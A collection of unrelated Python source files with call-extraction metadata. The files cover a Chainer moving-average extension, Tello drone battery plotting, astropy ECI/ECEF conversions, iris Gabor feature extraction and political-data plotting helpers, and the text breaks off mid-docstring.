positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value_tensor() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (20669, 20821), False, 'import re\n')]
|
import numpy as np
from chainer import cuda, Link, Chain, ChainList
from chainer.training import extension
def _namedpersistents_as_link(target):
assert isinstance(target, Link)
d = target.__dict__
for name in target._persistent:
yield '/' + name, d[name]
def _namedpersistents_as_chain(target):
assert isinstance(target, Chain)
for name, persistent in _namedpersistents_as_link(target):
yield name, persistent
d = target.__dict__
for name in target._children:
prefix = '/' + name
for path, persistent in namedpersistents(d[name]):
yield prefix + path, persistent
def _namedpersistents_as_chain_list(target):
assert isinstance(target, ChainList)
for name, persistent in _namedpersistents_as_link(target):
yield name, persistent
for idx, link in enumerate(target._children):
prefix = '/%d' % idx
for path, persistent in namedpersistents(link):
yield prefix + path, persistent
def namedpersistents(target):
if isinstance(target, Chain):
retriever = _namedpersistents_as_chain
elif isinstance(target, ChainList):
retriever = _namedpersistents_as_chain_list
    elif isinstance(target, Link):  # keep this branch last: Chain and ChainList are subclasses of Link
retriever = _namedpersistents_as_link
else:
raise ValueError
for name, persistent in retriever(target):
yield name, persistent
class ExponentialMovingAverage(extension.Extension):
name = 'ExponentialMovingAverage'
timing = 'post'
def __init__(self, target, rate, device=None):
self.shadow_target = target.copy()
self._shadow_data = dict()
self._rate = rate
self._device = device
self._initialized = False
self._param_names = set()
for name, _ in target.namedparams():
self._param_names.add(name)
def __call__(self, optimizer):
if not self._initialized:
self._initialize()
target_persistents = {}
for name, param in namedpersistents(optimizer.target):
target_persistents[name] = param
# copy all persistents to shadow_target
        # without this, the persistents in shadow_target would be left at their freshly initialized values in multiprocessing environments
for name, persistent in namedpersistents(self.shadow_target):
# persistent's type is numpy/cupy array or scalar (int/float)
if isinstance(persistent, cuda.ndarray):
persistent.data.copy_from(target_persistents[name].data, persistent.size * persistent.dtype.itemsize)
else:
persistent = target_persistents[name]
for name, param in optimizer.target.namedparams():
self._update_shadow(name, param)
for name, param in self.shadow_target.namedparams():
param.data = self._shadow_data[name]
@property
def trigger(self):
return None
def _initialize(self):
# necessary for cases when using multiprocess parallel updater
self.shadow_target.to_gpu(self._device)
self._initialized = True
def _update_shadow(self, name, param):
s, p = self._shadow_data.get(name), param.data
if p is None:
return
if s is None:
self._shadow_data[name] = cuda.get_array_module(p).array(p)
return
with cuda.get_device_from_array(p) as dev:
if int(dev) == -1:
s -= (1 - self._rate) * (s - p)
else:
kernel = cuda.elementwise('T p, T decay',
'T s',
's -= (1 - decay) * (s - p)',
'exponential_moving_average')
kernel(p, self._rate, s)
def serialize(self, serializer):
for name in self._param_names:
shadow_data = self._shadow_data.get(name)
data = serializer['shadow_params'](name, shadow_data)
if shadow_data is None and data is not None:
if self._device == -1:
self._shadow_data[name] = np.array(data)
else:
self._shadow_data[name] = cuda.to_gpu(data, device=self._device)
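

# Usage sketch (not part of the original module). Because __call__ receives the
# optimizer, one assumed way to register this hook is on the optimizer itself;
# `model` and `optimizer` below are placeholders for a chainer Link and its Optimizer.
#
#     ema = ExponentialMovingAverage(model, rate=0.999, device=0)
#     optimizer.add_hook(ema)
#     # for evaluation, read parameters from ema.shadow_target instead of model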
|
[
"chainer.cuda.get_device_from_array",
"chainer.cuda.get_array_module",
"chainer.cuda.elementwise",
"numpy.array",
"chainer.cuda.to_gpu"
] |
[((3435, 3464), 'chainer.cuda.get_device_from_array', 'cuda.get_device_from_array', (['p'], {}), '(p)\n', (3461, 3464), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3596, 3699), 'chainer.cuda.elementwise', 'cuda.elementwise', (['"""T p, T decay"""', '"""T s"""', '"""s -= (1 - decay) * (s - p)"""', '"""exponential_moving_average"""'], {}), "('T p, T decay', 'T s', 's -= (1 - decay) * (s - p)',\n 'exponential_moving_average')\n", (3612, 3699), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3368, 3392), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['p'], {}), '(p)\n', (3389, 3392), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((4203, 4217), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4211, 4217), True, 'import numpy as np\n'), ((4286, 4324), 'chainer.cuda.to_gpu', 'cuda.to_gpu', (['data'], {'device': 'self._device'}), '(data, device=self._device)\n', (4297, 4324), False, 'from chainer import cuda, Link, Chain, ChainList\n')]
|
#!/usr/bin/env python
import rospy
import os
import matplotlib.pyplot as plt
import pickle
from tello_driver.msg import TelloStatus
import numpy as np
import atexit
import datetime
RECORD_BATTERY = False
class BatteryLogPlot(object):
def __init__(self):
# current variables
self.zero_time = rospy.Time.now()
print(self.zero_time)
self.time_axis = []
self.battery_level = []
# Subscribe to Sensor and Odom topic
self.sub_tello_status = rospy.Subscriber('/tello/status', TelloStatus, self.cb_status)
rospy.loginfo('Battery Plot ready')
# at exit save plot
atexit.register(self.save_plot)
def cb_status(self, msg):
now = rospy.Time.now()
self.time_axis.append(now.secs-self.zero_time.secs)
self.battery_level.append(msg.battery_percentage)
print('time passed: ', now.secs-self.zero_time.secs, ' battery: ', msg.battery_percentage)
def save_plot(self):
print('dumping variables')
path = '%s/Documents/%s' % (os.getenv('HOME'),
datetime.datetime.now().strftime('battery-hover-tello-sensor-no-ds%Y-%m-%d_%H%M%S'))
        # save variables as pickle
pickle.dump([self.time_axis, self.battery_level], file(path + '.pickle', 'w'))
print('Variables saved')
def plot_battery():
# load pickles
# path_tello_sensor_esp_off = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle'
# path_tello_sensor_esp_on_ds_on = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle'
# path_tello_sensor_esp_on_ds_off = '/home/tello18/Documents/battery-hover-no-ds2020-09-06_222136'
tello_only_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-08-18.pickle'
tello_only_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-09-08_144210.pickle'
tello_sensor_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-2020-08-18_165044.pickle'
tello_sensor_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-off2020-09-07_180356.pickle'
tello_sensor_no_probs = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-off-no-props2020-09-08_175258.pickle'
tello_sensor_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-1-2020-08-20_185543.pickle'
tello_sensor_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-2-2020-08-21_155335.pickle'
tello_sensor_no_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-no-ds2020-09-06_222136.pickle'
tello_sensor_no_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-no-ds2020-09-10_183630.pickle'
time_tello, battery_level_tello = pickle.load(file(tello_only_1))
time_tello_2, battery_level_tello_2 = pickle.load(file(tello_only_2))
time_tello_sensor_no_probs, battery_level_tello_sensor_no_probs = pickle.load(file(tello_sensor_no_probs))
time_tello_sensor, battery_level_tello_sensor = pickle.load(file(tello_sensor_1))
time_tello_sensor_2, battery_level_tello_sensor_2 = pickle.load(file(tello_sensor_2))
time_tello_sensor_ds, battery_level_tello_ds_sensor = pickle.load(file(tello_sensor_ds_1))
time_tello_sensor_ds_2, battery_level_tello_ds_sensor_2 = pickle.load(file(tello_sensor_ds_2))
time_tello_sensor_no_ds, battery_level_tello_sensor_no_ds = pickle.load(file(tello_sensor_no_ds_1))
time_tello_sensor_no_ds_2, battery_level_tello_sensor_no_ds_2 = pickle.load(file(tello_sensor_no_ds_2))
# time in min
time_tello_min = [x / 60.0 for x in time_tello]
time_tello_min_2 = [x / 60.0 for x in time_tello_2]
time_tello_sensor_no_probs_min = [x / 60.0 for x in time_tello_sensor_no_probs]
time_tello_sensor_min = [x / 60.0 for x in time_tello_sensor]
time_tello_sensor_min_2 = [x / 60.0 for x in time_tello_sensor_2]
time_tello_sensor_ds_min = [x / 60.0 for x in time_tello_sensor_ds]
time_tello_sensor_ds_min_2 = [x / 60.0 for x in time_tello_sensor_ds_2]
time_tello_sensor_no_ds_min = [x / 60.0 for x in time_tello_sensor_no_ds]
time_tello_sensor_no_ds_min_2 = [x / 60.0 for x in time_tello_sensor_no_ds_2]
# plot
fig_battery = plt.figure()
ax_battery = fig_battery.add_subplot(111)
# ax_battery.scatter(time_tello_min, battery_level_tello, marker='.', c='b', linewidths=0.01, alpha=0.1)
# , 'o', color='b', label='Tello only')
# Fit with polyfit
# p = np.poly1d(np.polyfit(time_tello_min, battery_level_tello, 3))
# ax_battery.plot(time_tello_min, p(time_tello_min), color='b', linewidth=2.0, label='Tello only')
ax_battery.plot(time_tello_min, battery_level_tello, color='g', linewidth=1.0,
label='Tello only: %.1f min' % time_tello_min[-1])
ax_battery.plot(time_tello_min_2, battery_level_tello_2, color='g', linewidth=1.0,
label='Tello only: %.1f min' % time_tello_min_2[-1])
ax_battery.plot(time_tello_sensor_no_probs_min, battery_level_tello_sensor_no_probs, color='c', linewidth=1.0,
label='Tello no guards with sensor off: %.1f min' % time_tello_sensor_no_probs_min[-1])
ax_battery.plot(time_tello_sensor_min, battery_level_tello_sensor, color='b', linewidth=1.0,
label='Tello with sensor off: %.1f min' % time_tello_sensor_min[-1])
ax_battery.plot(time_tello_sensor_min_2, battery_level_tello_sensor_2, color='b', linewidth=1.0,
label='Tello with sensor off: %.1f min' % time_tello_sensor_min_2[-1])
ax_battery.plot(time_tello_sensor_ds_min, battery_level_tello_ds_sensor, color='y', linewidth=1.0,
label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min[-1])
ax_battery.plot(time_tello_sensor_ds_min_2, battery_level_tello_ds_sensor_2, color='y', linewidth=1.0,
label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min_2[-1])
ax_battery.plot(time_tello_sensor_no_ds_min, battery_level_tello_sensor_no_ds, color='k', linewidth=1.0,
label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min[-1])
ax_battery.plot(time_tello_sensor_no_ds_min_2, battery_level_tello_sensor_no_ds_2, color='k', linewidth=1.0,
label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min_2[-1])
ax_battery.set_xlabel('time in [min]')
ax_battery.set_ylabel('battery level in [%]')
ax_battery.set_title('Flight Time')
ax_battery.legend()
plt.xticks(np.arange(0, 12.1, step=1.0))
plt.yticks(np.arange(0, 100.1, step=10.0))
plt.grid(linewidth=.5)
plt.show()
def main():
rospy.init_node('battery_plot_node')
if RECORD_BATTERY:
sensor = BatteryLogPlot()
rospy.spin() # keep process alive
else:
plot_battery()
if __name__ == '__main__':
main()
|
[
"atexit.register",
"matplotlib.pyplot.show",
"rospy.Time.now",
"rospy.Subscriber",
"datetime.datetime.now",
"rospy.loginfo",
"matplotlib.pyplot.figure",
"numpy.arange",
"rospy.init_node",
"rospy.spin",
"matplotlib.pyplot.grid",
"os.getenv"
] |
[((4337, 4349), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4347, 4349), True, 'import matplotlib.pyplot as plt\n'), ((6745, 6768), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'linewidth': '(0.5)'}), '(linewidth=0.5)\n', (6753, 6768), True, 'import matplotlib.pyplot as plt\n'), ((6772, 6782), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6780, 6782), True, 'import matplotlib.pyplot as plt\n'), ((6801, 6837), 'rospy.init_node', 'rospy.init_node', (['"""battery_plot_node"""'], {}), "('battery_plot_node')\n", (6816, 6837), False, 'import rospy\n'), ((315, 331), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (329, 331), False, 'import rospy\n'), ((500, 562), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/tello/status"""', 'TelloStatus', 'self.cb_status'], {}), "('/tello/status', TelloStatus, self.cb_status)\n", (516, 562), False, 'import rospy\n'), ((571, 606), 'rospy.loginfo', 'rospy.loginfo', (['"""Battery Plot ready"""'], {}), "('Battery Plot ready')\n", (584, 606), False, 'import rospy\n'), ((644, 675), 'atexit.register', 'atexit.register', (['self.save_plot'], {}), '(self.save_plot)\n', (659, 675), False, 'import atexit\n'), ((721, 737), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (735, 737), False, 'import rospy\n'), ((6664, 6692), 'numpy.arange', 'np.arange', (['(0)', '(12.1)'], {'step': '(1.0)'}), '(0, 12.1, step=1.0)\n', (6673, 6692), True, 'import numpy as np\n'), ((6709, 6739), 'numpy.arange', 'np.arange', (['(0)', '(100.1)'], {'step': '(10.0)'}), '(0, 100.1, step=10.0)\n', (6718, 6739), True, 'import numpy as np\n'), ((6908, 6920), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6918, 6920), False, 'import rospy\n'), ((1054, 1071), 'os.getenv', 'os.getenv', (['"""HOME"""'], {}), "('HOME')\n", (1063, 1071), False, 'import os\n'), ((1108, 1131), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1129, 1131), False, 'import datetime\n')]
|
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import math
test_scores=[88,92,79,93,85]
print(np.mean(test_scores))
curved_5=[score + 5 for score in test_scores]
print(np.mean(curved_5))
curved_10=[score + 10 for score in test_scores]
print(np.mean(curved_10))
curved_sqrt=[math.sqrt(score)*10 for score in test_scores]
print(np.mean(curved_sqrt))
# # Used list comprehensions to make the code more concise and readable, chose more descriptive names for the resulting lists and variables, and used numpy for the mean calculation.
# # curved_5 and curved_10 still share the same logic, so they can be generalised into a single function; a sketch of that refactoring follows below.
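
# A minimal sketch of that refactoring (the helper name is illustrative, not part of the original script):
def curve_flat(scores, bonus):
    return [score + bonus for score in scores]

print(np.mean(curve_flat(test_scores, 5)))   # matches curved_5
print(np.mean(curve_flat(test_scores, 10)))  # matches curved_10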
|
[
"numpy.mean",
"math.sqrt"
] |
[((110, 130), 'numpy.mean', 'np.mean', (['test_scores'], {}), '(test_scores)\n', (117, 130), True, 'import numpy as np\n'), ((188, 205), 'numpy.mean', 'np.mean', (['curved_5'], {}), '(curved_5)\n', (195, 205), True, 'import numpy as np\n'), ((265, 283), 'numpy.mean', 'np.mean', (['curved_10'], {}), '(curved_10)\n', (272, 283), True, 'import numpy as np\n'), ((354, 374), 'numpy.mean', 'np.mean', (['curved_sqrt'], {}), '(curved_sqrt)\n', (361, 374), True, 'import numpy as np\n'), ((301, 317), 'math.sqrt', 'math.sqrt', (['score'], {}), '(score)\n', (310, 317), False, 'import math\n')]
|
#eci_ecef_conversions.py
#<NAME> (nhz2)
#November 24, 2019
# using examples from https://astropy.readthedocs.io/en/latest/coordinates/velocities.html
"""Module for using astropy to convert between ECI and ECEF coordinates and velocities"""
import astropy.units as u
from astropy.coordinates import (ITRS,GCRS)
from astropy.coordinates import (CartesianRepresentation,CartesianDifferential)
from astropy.time import Time
import numpy as np
def time2astropyTime(time,init_gps_weeknum):
"""
args:
time(double): time since init_GPS_week_number in seconds
init_gps_weeknum(int): initial GPS week number."""
return Time(init_gps_weeknum*7*24*60*60, time, scale='tai', format='gps')
def ecef2eci_mc_runs(times, mc_runs, init_gps_weeknum):
'''
Times and mc_runs have the same length.
args:
mc_runs, a list of all mc_runs, each of which is a list of positions across the duration of the run
times, a list of times, measured in seconds since the pan_epoch
init_gps_weeknum, the GPS week number of the pan epoch
returns:
a list of all the mc_runs, each of which is a list of positions in ECI
'''
num_times = len(times)
list_of_mc_snapshots = np.array(mc_runs).transpose((1,0,2))
list_of_mc_snapshots_eci = np.array([ecef2eci_same_time_batch(times[idx], list_of_mc_snapshots[idx], init_gps_weeknum) for idx in range(num_times)])
return list_of_mc_snapshots_eci
def get_covariances(mc_snapshots_eci):
'''Return a list of the covariances of the position vectors in ECI
args:
        mc_snapshots_eci: indexed first by time, then by MC run, giving the position vectors
    returns:
        a list of 3 x 3 covariance matrices over time'''
return np.array([np.cov(x.T) for x in mc_snapshots_eci])
def ecef2eci_same_time_batch(time, vectors, init_gps_weeknum):
'''Converts a batch of position vectors at the same time into the ECI coordinate frame
args:
vectors: a list of 3-element numpy arrays, each representing a position vector in ECEF
time: a single time in seconds since the pan epoch
init_gps_weeknum: the pan epoch
returns:
a list of 3-element numpy arrays representing the position in ECI coordinates, as a 2d numpy matrix
'''
    vectors_transposed = np.array(vectors).T
    # the returned positions do not depend on the velocity, so the positions are passed again as a dummy velocity argument
    return ecef2eci(time, vectors_transposed, vectors_transposed, init_gps_weeknum)[0].T
def ecef2eci(time,r_ecef,v_ecef,init_gps_weeknum):
"""Returns a tuple of position and velocity in ECI"""
coord_ecef=ITRS(x=r_ecef[0]*u.m, y=r_ecef[1]*u.m, z=r_ecef[2]*u.m,
v_x=v_ecef[0]*u.m/u.s, v_y=v_ecef[1]*u.m/u.s, v_z=v_ecef[2]*u.m/u.s,
representation_type=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=time2astropyTime(time,init_gps_weeknum))
coord_eci= coord_ecef.transform_to(GCRS(obstime=time2astropyTime(time,init_gps_weeknum)))
return (coord_eci.cartesian.xyz.to_value(u.m),coord_eci.velocity.d_xyz.to_value(u.m/u.s))
def eci2ecef(time,r_eci,v_eci,init_gps_weeknum):
"""Returns a tuple of position and velocity in ECEF"""
coord_eci=GCRS(x=r_eci[0]*u.m, y=r_eci[1]*u.m, z=r_eci[2]*u.m,
v_x=v_eci[0]*u.m/u.s, v_y=v_eci[1]*u.m/u.s, v_z=v_eci[2]*u.m/u.s,
representation_type=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=time2astropyTime(time,init_gps_weeknum))
coord_ecef= coord_eci.transform_to(ITRS(obstime=time2astropyTime(time,init_gps_weeknum)))
return (coord_ecef.cartesian.xyz.to_value(u.m),coord_ecef.velocity.d_xyz.to_value(u.m/u.s))
if __name__ == '__main__':
xs = [[0,0,3],[1,0,0],[0,1,0],[0,0,1],[1,1,1]]
xss = [ [[1,2,3],[4,5,6], [4,5,6]], [[4,2,3],[4,5,6],[5,15,16]], [[1,2,3],[4,5,6], [40,15,60]] ]
def copy_xs():
return [[y for y in x] for x in xs]
mc_runs = [xss[0], xss[1], xss[2]]
times = [1,2,3]
converted_mc_runs = ecef2eci_mc_runs(times, mc_runs, 2045)
covariances = get_covariances(converted_mc_runs)
# print(converted_mc_runs.shape)
# print(converted_mc_runs)
print(covariances.shape)
print(covariances)
# print(covariances)
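
    # Direct single-state conversion (a sketch; the numbers below are illustrative, in metres and m/s):
    # r_eci, v_eci = ecef2eci(0.0, [7.0e6, 0.0, 0.0], [0.0, 7.5e3, 0.0], 2045)
    # r_ecef, v_ecef = eci2ecef(0.0, r_eci, v_eci, 2045)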
|
[
"astropy.time.Time",
"numpy.cov",
"numpy.array"
] |
[((638, 712), 'astropy.time.Time', 'Time', (['(init_gps_weeknum * 7 * 24 * 60 * 60)', 'time'], {'scale': '"""tai"""', 'format': '"""gps"""'}), "(init_gps_weeknum * 7 * 24 * 60 * 60, time, scale='tai', format='gps')\n", (642, 712), False, 'from astropy.time import Time\n'), ((2277, 2294), 'numpy.array', 'np.array', (['vectors'], {}), '(vectors)\n', (2285, 2294), True, 'import numpy as np\n'), ((1222, 1239), 'numpy.array', 'np.array', (['mc_runs'], {}), '(mc_runs)\n', (1230, 1239), True, 'import numpy as np\n'), ((1719, 1730), 'numpy.cov', 'np.cov', (['x.T'], {}), '(x.T)\n', (1725, 1730), True, 'import numpy as np\n')]
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: <NAME>
@Date: 2018-08-10 19:31:47
"""
from __future__ import absolute_import, division, print_function
import csv
import os
import numpy as np
np.random.seed(0)
ratio = 0.9
def gen_lines(path, d):
path = os.path.join(path, d)
lines = []
for f in os.listdir(path):
if f.endswith('.jpg'):
lines.append([os.path.join(path, f), d])
return lines
path = 'data'
dirs = sorted(os.listdir(path))
all_lines = []
for d in dirs:
all_lines.append(gen_lines(path, d))
class_count = {}
len_sum = 0
for lines in all_lines:
print('{} -> {}'.format(lines[0][1], len(lines)))
class_count[lines[0][1]] = len(lines)
len_sum += len(lines)
len_avg = int(len_sum/len(all_lines))
cc = sorted(class_count, key=class_count.get, reverse=True)
with open('class_count.txt', 'w') as f:
for c in cc:
f.write('{} {}\n'.format(c, class_count[c]))
train_lines = []
valid_lines = []
for lines in all_lines:
np.random.shuffle(lines)
cut = int(len(lines)*ratio)
train_lines += lines[:cut]
valid_lines += lines[cut:]
np.random.shuffle(train_lines)
np.random.shuffle(valid_lines)
with open('train.csv', 'wb') as f:
cw = csv.writer(f)
for line in train_lines:
cw.writerow(line)
with open('valid.csv', 'wb') as f:
cw = csv.writer(f)
for line in valid_lines:
cw.writerow(line)
|
[
"numpy.random.seed",
"csv.writer",
"os.path.join",
"os.listdir",
"numpy.random.shuffle"
] |
[((212, 229), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (226, 229), True, 'import numpy as np\n'), ((1097, 1127), 'numpy.random.shuffle', 'np.random.shuffle', (['train_lines'], {}), '(train_lines)\n', (1114, 1127), True, 'import numpy as np\n'), ((1128, 1158), 'numpy.random.shuffle', 'np.random.shuffle', (['valid_lines'], {}), '(valid_lines)\n', (1145, 1158), True, 'import numpy as np\n'), ((277, 298), 'os.path.join', 'os.path.join', (['path', 'd'], {}), '(path, d)\n', (289, 298), False, 'import os\n'), ((323, 339), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (333, 339), False, 'import os\n'), ((460, 476), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (470, 476), False, 'import os\n'), ((983, 1007), 'numpy.random.shuffle', 'np.random.shuffle', (['lines'], {}), '(lines)\n', (1000, 1007), True, 'import numpy as np\n'), ((1202, 1215), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1212, 1215), False, 'import csv\n'), ((1308, 1321), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1318, 1321), False, 'import csv\n'), ((388, 409), 'os.path.join', 'os.path.join', (['path', 'f'], {}), '(path, f)\n', (400, 409), False, 'import os\n')]
|
import cv2
import numpy as np
import glob
import math
import scipy
from scipy.spatial import distance
from scipy import signal
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
#modulating function as defined in paper
def m(x, y, f):
    val = np.cos(2*np.pi*f*math.sqrt(x**2 + y**2))
return val
#spatial filter as defined in paper
def gabor(x, y, dx, dy, f):
gb = (1/(2*math.pi*dx*dy))*np.exp(-0.5*(x**2 / dx**2 + y**2 / dy**2)) * m(x, y, f)
return gb
#function to calculate spatial filter over 8x8 blocks
def spatial(f,dx,dy):
sfilter=np.zeros((8,8))
for i in range(8):
for j in range(8):
sfilter[i,j]=gabor((-4+j),(-4+i),dx,dy,f)
return sfilter
def get_vec(convolvedtrain1,convolvedtrain2):
feature_vec=[]
for i in range(6):
for j in range(64):
#Run 8 by 8 filtered block iteratively over the entire image
start_height = i*8
end_height = start_height+8
start_wid = j*8
end_wid = start_wid+8
grid1 = convolvedtrain1[start_height:end_height, start_wid:end_wid]
grid2 = convolvedtrain2[start_height:end_height, start_wid:end_wid]
# Channel 1
absolute = np.absolute(grid1)
# mean
mean = np.mean(absolute)
feature_vec.append(mean)
            # average absolute deviation
std = np.mean(np.absolute(absolute-mean))
feature_vec.append(std)
# Channel 2
absolute = np.absolute(grid2)
# mean
mean = np.mean(absolute)
feature_vec.append(mean)
            # average absolute deviation
std = np.mean(np.absolute(absolute-mean))
feature_vec.append(std)
return feature_vec
def FeatureExtraction(enhanced):
con1=[]
con2=[]
#get spatial filters
filter1=spatial(0.67,3,1.5)
filter2=spatial(0.67,4,1.5)
feature_vector=[]
for i in range(len(enhanced)):
img=enhanced[i]
#define a 48x512 region over which the filters are applied
img_roi=img[:48,:]
filtered1=scipy.signal.convolve2d(img_roi,filter1,mode='same')
filtered2=scipy.signal.convolve2d(img_roi,filter2,mode='same')
con1.append(filtered1)
con2.append(filtered2)
fv=get_vec(filtered1,filtered2)
feature_vector.append(fv)
return feature_vector #each feature vector has a dimension of 1536
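

# Usage sketch (not part of the original module): `enhanced` is assumed to be a list of
# normalised/enhanced iris images (greyscale numpy arrays, at least 48 rows by 512 columns);
# the glob pattern below is a placeholder.
#
#     enhanced = [cv2.imread(p, cv2.IMREAD_GRAYSCALE) for p in glob.glob('enhanced/*.png')]
#     features = FeatureExtraction(enhanced)
#     # each vector has 6*64 blocks x 2 filter channels x (mean, mean absolute deviation) = 1536 values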
|
[
"numpy.absolute",
"math.sqrt",
"scipy.signal.convolve2d",
"numpy.zeros",
"numpy.mean",
"numpy.exp"
] |
[((663, 679), 'numpy.zeros', 'np.zeros', (['(8, 8)'], {}), '((8, 8))\n', (671, 679), True, 'import numpy as np\n'), ((2311, 2365), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter1'], {'mode': '"""same"""'}), "(img_roi, filter1, mode='same')\n", (2334, 2365), False, 'import scipy\n'), ((2382, 2436), 'scipy.signal.convolve2d', 'scipy.signal.convolve2d', (['img_roi', 'filter2'], {'mode': '"""same"""'}), "(img_roi, filter2, mode='same')\n", (2405, 2436), False, 'import scipy\n'), ((369, 395), 'math.sqrt', 'math.sqrt', (['(x ** 2 + y ** 2)'], {}), '(x ** 2 + y ** 2)\n', (378, 395), False, 'import math\n'), ((504, 556), 'numpy.exp', 'np.exp', (['(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))'], {}), '(-0.5 * (x ** 2 / dx ** 2 + y ** 2 / dy ** 2))\n', (510, 556), True, 'import numpy as np\n'), ((1373, 1391), 'numpy.absolute', 'np.absolute', (['grid1'], {}), '(grid1)\n', (1384, 1391), True, 'import numpy as np\n'), ((1438, 1455), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1445, 1455), True, 'import numpy as np\n'), ((1678, 1696), 'numpy.absolute', 'np.absolute', (['grid2'], {}), '(grid2)\n', (1689, 1696), True, 'import numpy as np\n'), ((1743, 1760), 'numpy.mean', 'np.mean', (['absolute'], {}), '(absolute)\n', (1750, 1760), True, 'import numpy as np\n'), ((1554, 1582), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1565, 1582), True, 'import numpy as np\n'), ((1859, 1887), 'numpy.absolute', 'np.absolute', (['(absolute - mean)'], {}), '(absolute - mean)\n', (1870, 1887), True, 'import numpy as np\n')]
|
#export
import matplotlib
import matplotlib.pyplot as plt
from datetime import datetime
import glob
import emoji
import numpy as np
import seaborn as sns
def convert(year,month,date):
return int(datetime(year, month, date, 0, 0, 0).timestamp()*1000)
def convert_reverse(timestamp):
dt_object = datetime.fromtimestamp(timestamp/1000)
print("dt_object =", dt_object)
return dt_object
def add_extra_timeperiod(plt,window,start_time,end_time):
start_election = convert(2019,4,11)
end_election = convert(2019,5,23)
pulwama_event= convert(2019,2,14)
balakot_event= convert(2019,2,27)
day_start=int((start_election-start_time)/(window*24*60*60*1000))
day_end=int((end_election-start_time)/(window*24*60*60*1000))
plt.axvline(day_start, linestyle='--', color='r')
for i in range(day_start+1,day_end):
plt.axvline(i, linestyle='--',alpha=0.2, color='r')
plt.axvline(day_end, linestyle='--', color='r')
day_pulwama=int((pulwama_event-start_time)/(window*24*60*60*1000))
day_balakot=int((balakot_event-start_time)/(window*24*60*60*1000))
plt.axvline(day_pulwama, linestyle='--',alpha=0.5, color='k',linewidth=1.5)
plt.axvline(day_balakot, linestyle='--',alpha=0.5, color='k',linewidth=1.5)
x_tick_keys=[]
x_tick_label=[]
for year in [2018,2019]:
for month in range(1,13):
if(year==2019 and (month in [3,4,6])):
continue
timestamp_begin_month=convert(year,month,1)
if(timestamp_begin_month>start_time and timestamp_begin_month<end_time):
first_day_month =int((timestamp_begin_month-start_time)/(window*24*60*60*1000))
x_tick_keys.append(first_day_month)
x_tick_label.append(str(month)+'/'+str(year))
#### for pulwama +balakot
x_tick_keys.append(day_pulwama)
x_tick_label.append('pulwama event')
x_tick_keys.append(day_balakot)
x_tick_label.append('balakot event')
x_tick_keys.append(day_start)
x_tick_label.append('election start')
x_tick_keys.append(day_end)
x_tick_label.append('election end')
plt.xticks(x_tick_keys, x_tick_label, rotation=90)
return plt
def emoji_string(ele):
emoji_files=glob.glob("../Political_Results/Emoji/*")
try:
emoji_name="-".join(emoji.demojize(ele)[1:-1].split('_'))
except:
return " "
str1= " "
for emoji_file in emoji_files:
temp=emoji_file.split("/")[3]
emoji_filename = temp.split("_")[0]
if(emoji_filename==emoji_name):
            return "\\includegraphics[height=1em]{samples/Emoji/"+temp+"}"
print(emoji_name+" not found")
return str1
def latex_emoji_communities(community_dict):
    str1="\\begin{table}[!htb]\n\\begin{tabular}{c}\n \\hline Emojis \\\\\\hline"
for key in community_dict:
for ele in community_dict[key]:
str1+=emoji_string(ele)+","
str1+="\\\\\\hline\n"
    str1+="\\end{tabular}\n\\caption{Co-occurring emojis captured as communities}\n \\label{tab:emoji_communities}\n\\end{table}"
return str1
def make_confusion_matrix(cf,
group_names=None,
categories='auto',
count=True,
percent=True,
cbar=True,
xyticks=True,
xyplotlabels=True,
sum_stats=True,
figsize=None,
cmap='Blues',
title=None):
'''
    This function will make a pretty plot of an sklearn confusion matrix cf using a Seaborn heatmap visualization.
Arguments
---------
cf: confusion matrix to be passed in
group_names: List of strings that represent the labels row by row to be shown in each square.
categories: List of strings containing the categories to be displayed on the x,y axis. Default is 'auto'
